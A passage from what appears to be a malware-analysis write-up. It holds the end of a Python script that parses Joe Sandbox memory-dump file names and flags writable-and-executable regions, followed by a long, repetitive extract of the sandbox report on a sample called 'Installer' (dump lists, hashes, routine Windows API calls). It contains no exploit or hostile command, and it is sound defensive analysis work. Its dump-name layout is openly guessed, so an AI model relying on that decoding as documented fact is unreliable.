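EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Documented Win32 values for MEMORY_BASIC_INFORMATION.Type
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

# ASSUMED layout of the dump file name (inferred from the report, not documented):
# <proc>.<stage>.<dump id>.<base address>.<protect>.<unknown>.<type>.<unknown>.sdmp
SDMP_RE = re.compile(
    r"^(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)

# Constructed sample: the dump list as printed in one function record of this report.
SAMPLE_BLOCK = """Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
"""


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def is_image(self) -> bool:
        return self.mem_type == MEM_IMAGE

    @property
    def protect_name(self) -> str:
        return PROTECT_NAMES.get(self.protect, f"0x{self.protect:X}")


def parse_dump_name(name: str) -> DumpRegion:
    """Decode one .sdmp file name under the assumed field layout."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised dump name: {name!r}")
    return DumpRegion(name=m.group(0), base=int(m.group(4), 16),
                      protect=int(m.group(5), 16), mem_type=int(m.group(7), 16))


def parse_dump_sources(report_text: str) -> list[DumpRegion]:
    """Pull every 'Source File:' / 'Associated:' dump name out of a report block.
    Tolerates the '• ' bullet, the ', Offset: ...' suffix and the 'Download File'
    link text that web extraction glues onto the name. Duplicates are dropped."""
    regions, seen = [], set()
    for raw in report_text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not (line.startswith("Source File:") or line.startswith("Associated:")):
            continue
        name = line.split(":", 1)[1].split(",")[0].replace("Download File", "").strip()
        if name in seen:
            continue
        seen.add(name)
        regions.append(parse_dump_name(name))
    return regions


def flag_wx_regions(regions: list[DumpRegion]) -> list[DumpRegion]:
    """Regions that are writable and executable at once: the first thing to pull
    from a sample that injects code, since a clean image section is never W+X."""
    return [r for r in regions if r.writable and r.executable]


if __name__ == "__main__":
    for r in parse_dump_sources(SAMPLE_BLOCK):
        tag = "  <-- W+X" if r.writable and r.executable else ""
        print(f"{r.base:08X}  {r.protect_name:<24} image={r.is_image}{tag}")
```

Run it against a copied report block; the decoding of the two fields marked unknown, and the layout as a whole, should be checked against Joe Sandbox's own documentation before relying on it.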
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID:
• String ID: (=5$0
• API String ID: 0-3225634261
• Opcode ID: 978de0283461ef0397d6b3052a00d1e9e56e004519a4b6a549fa391ba8d049ce
• Instruction ID: 8b275c90efd49c89426d573c5ee53f8f470c6b08740a1d02cf98e7ebaf1c7566
• Opcode Fuzzy Hash: 978de0283461ef0397d6b3052a00d1e9e56e004519a4b6a549fa391ba8d049ce
• Instruction Fuzzy Hash: 33B1F83090061A8BCB2ECE68C555EBEB7B5AF0430AF25461DEE52976B0C7319ACDCB41
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00365BB9,?,?,00000008,?,?,0036BCAB,00000000), ref: 00365E8B
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 664f0ec06631e01df631379644eac91f919c1c9ee952985b76dac37016305c5f
• Instruction ID: 482b9925fd2e971110136e76012bdd3f16f093fcb398b01bc74a7b53d3fbb21c
• Opcode Fuzzy Hash: 664f0ec06631e01df631379644eac91f919c1c9ee952985b76dac37016305c5f
• Instruction Fuzzy Hash: 28B12A31510A09DFDB16CF28C48AB657BE0FF45364F2AC668E899CF2A5C735E991CB40
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0034F56B
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 7e2ff42586b9c5c6f260805d9a8f210f33aeb18d77515112e1827fd7bedd9105
• Instruction ID: 73c3e841fff5b50e225b2825cd434b280751fb05199c054c1fd127fced18b6d6
• Opcode Fuzzy Hash: 7e2ff42586b9c5c6f260805d9a8f210f33aeb18d77515112e1827fd7bedd9105
• Instruction Fuzzy Hash: FFA19DB29107199FDB2ACF54D885799FBF9FB48364F29812ED419EB260C334A980CF50
APIs
  • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
  • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00361894
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 728e6dd89a433faf345152fc423d63c88f5ed6d1aa2b03d54d44c0432089f24c
• Instruction ID: 6b49340724f83314cadf05b0e1d97bda3564117a8eda287cee7190b54754aa5f
• Opcode Fuzzy Hash: 728e6dd89a433faf345152fc423d63c88f5ed6d1aa2b03d54d44c0432089f24c
• Instruction Fuzzy Hash: 4421F232610206AFDB2A9B25CC42EBA33ACEF04715F14807AFD02CB155EB34ED44DB50
APIs
  • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00361580,00000001,00000000,?,-00000050,?,00361363,00000000,-00000002,00000000,?,00000055,?), ref: 0036154A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: ffb39d3e248f360fc41c2096e292891a1aea2c8d683eec68f22f3365bc825005
                                                                                                                                                                                                                                                    • Instruction ID: 7bdf9048343b20015790f3b6ec1b58f602004e63e9e79cb5c9178405c69d9547
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffb39d3e248f360fc41c2096e292891a1aea2c8d683eec68f22f3365bc825005
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33110C372007055FDB199F39C8916BAB7A1FFC0758B19842DEA4787B40E771B942C740
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 003619B4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: 29ce84442e4dc416c9d8c5974797f0c863784bdf5f53a5327b02055e9d17b84a
                                                                                                                                                                                                                                                    • Instruction ID: 4b8d1af0b929fafc5ae2ce0c3e53b0a7a4967cb321ed016a24b1c9435cdce569
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29ce84442e4dc416c9d8c5974797f0c863784bdf5f53a5327b02055e9d17b84a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45110232610206ABDB26AF68CC12EBB77ECEF05714B14817AF902DB141EB38ED449790
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0036179C,00000000,00000000,?), ref: 00361B39
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: b63ef82c98fbe41100e6abf8e88027670223638db17d1b31861541fe065eb0d0
                                                                                                                                                                                                                                                    • Instruction ID: b25a90fa6b5169d45daebb15954122ab3d08cc24c61818eb5bb7738b26e52a69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b63ef82c98fbe41100e6abf8e88027670223638db17d1b31861541fe065eb0d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3101F933710112ABDB295B658C0AAFA3768EF40754F19C468ED06A7688FB70FE41C790
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(00361840,00000001,?,?,-00000050,?,0036132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0036181D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: 2da75450bbafa402af26dd20958f2c1fadb94864651bb77b3b4d2489a53c18c7
                                                                                                                                                                                                                                                    • Instruction ID: dbccfc4e2c720efd23bfac482c63c2eb3649b3fcdcedab90b4e3120ebc3fc3f0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2da75450bbafa402af26dd20958f2c1fadb94864651bb77b3b4d2489a53c18c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F0F6362003045FDB265F79DC81A7A7B95EF80768F19C42CF9458B690D6B19C42C750
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 003580E1: EnterCriticalSection.KERNEL32(?,?,0035C5F8,?,00379290,00000008,0035C4EA,?,?,?), ref: 003580F0
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0035D1B0,00000001,00379310,0000000C,0035CB11,-00000050), ref: 0035D1F5
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
APIs
  • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
  • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
• EnumSystemLocalesW.KERNEL32(00361960,00000001,?,?,?,00361385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0036194C
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00356E33,?,20001004,00000000,00000002,?,?,00355D3D), ref: 0035CC49
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 0034F8E2
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                                                                                                                    • Opcode ID: c220a1a011bdc3199bf0d79af33955bbeb1a5db8b6483fa8f9061a9a11600ba3
                                                                                                                                                                                                                                                    • Instruction ID: 5076cf65ebc588612f83fa1d6c84799eb5fa9aa2ee3c53fb5feb4612db0b439f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c220a1a011bdc3199bf0d79af33955bbeb1a5db8b6483fa8f9061a9a11600ba3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF710572900A096FDF239E648C51FAF77BAEF45311F2A8055E904BB295E735DC408F62
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0034FE70
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034FE9C
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0034FEDB
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034FEF8
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0034FF37
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034FF54
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0034FF96
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0034FFB9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                                                                                                    • Opcode ID: 96885d3f46b6412fb5d64e7713fbdbe41b5590211f6d4e42bfed639f5204ea18
                                                                                                                                                                                                                                                    • Instruction ID: 50f55af91fd02c9c5451e34386ab74c70a058d26adf95e89798d6d107f7a4883
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96885d3f46b6412fb5d64e7713fbdbe41b5590211f6d4e42bfed639f5204ea18
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65519D7260061AAFEB225F60CC45FAB7BE9EF45750F1A443AFD15DE1A0D730AC548B50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                                                    • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction ID: 96f4aed62ae2d163a8404596f163b5eceafb0931b0bd98938af56fa7f48f2c9e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AB16872A003559FDB178F24CC81FAE7BB5EF19311F1A4165EC44AF292D6749E09C7A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350D77
